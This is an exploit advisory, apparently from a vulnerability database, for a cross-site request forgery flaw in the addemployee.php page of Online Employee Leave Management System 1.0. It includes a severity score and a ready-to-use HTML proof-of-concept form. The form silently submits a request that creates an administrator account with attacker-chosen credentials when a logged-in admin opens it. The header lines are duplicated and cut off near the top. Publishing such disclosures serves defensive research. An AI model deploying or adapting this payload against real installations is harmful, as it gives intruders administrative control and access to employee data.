Vulnerabilities

Online Employee Leave Management System 1.0 Cross Site Request Forgery

# Exploit Title: Online Employee Leave Management System 1.0 - Cross-Site Request Forgery (addemployee.php)
# Date: 05/09/2022
# Exploit Author: Amolo Hunters
# Software Link: https://w # Exploit Title: Online Employee Leave Management System 1.0 - Cross-Site Request Forgery (addemployee.php)
# Date: 05/09/2022
# Exploit Author: Amolo Hunters
# Software Link: https://www.sourcecodester.com/php/15374/online-employee-leave-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Linux

Title:
================
Online Employee Leave Management System 1.0 - Cross-Site Request Forgery (addemployee.php)

Summary:
================
The Online Employee Leave Management System suffers from a vulnerability called Cross-Site Request Forgery that affects the addemployee.php application used to add employees with administrative privileges. By failing to block against this attack, malicious users can take advantage of this weakness to spoof a request leading to the creation of a new account with administrative privileges.

Severity Level:
================
5.4 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Affected Product:
================
Online Employee Leave Management System v1.0

Steps to Reproduce:
================

1. Create an HTML file and paste the following code:

<html>
<title>Online Employee Leave Management System (addemployee.php) CSRF PoC</title>
<center>
<h1>Online Employee Leave Management System (addemployee.php) CSRF PoC</h1>
<p>by Amolo Hunters</p>
<form action="http://target.com/elms/admin/addemployee.php" method="POST">
<input type="hidden" name="empcode" value="1337" />
<input type="hidden" name="firstName" value="AmoloHT" />
<input type="hidden" name="lastName" value="PoC" />
<input type="hidden" name="email" value="amoloht@poc.com" />
<input type="hidden" name="password" value="hacker123" />
<input type="hidden" name="confirmpassword" value="hacker123" />
<input type="hidden" name="gender" value="Other" />
<input type="hidden" name="dob" value="3 June, 2022" />
<input type="hidden" name="department" value="Information Technology" />
<input type="hidden" name="country" value="Brazil" />
<input type="hidden" name="city" value="PoC" />
<input type="hidden" name="address" value="PoC" />
<input type="hidden" name="mobileno" value="0000000000" />
<input type="hidden" name="add" value="" />
<input type="submit" value="Submit request" />
</form>
</center>
</html>

2. Save the file and run it in the browser
Note: you need to be logged in as an administrator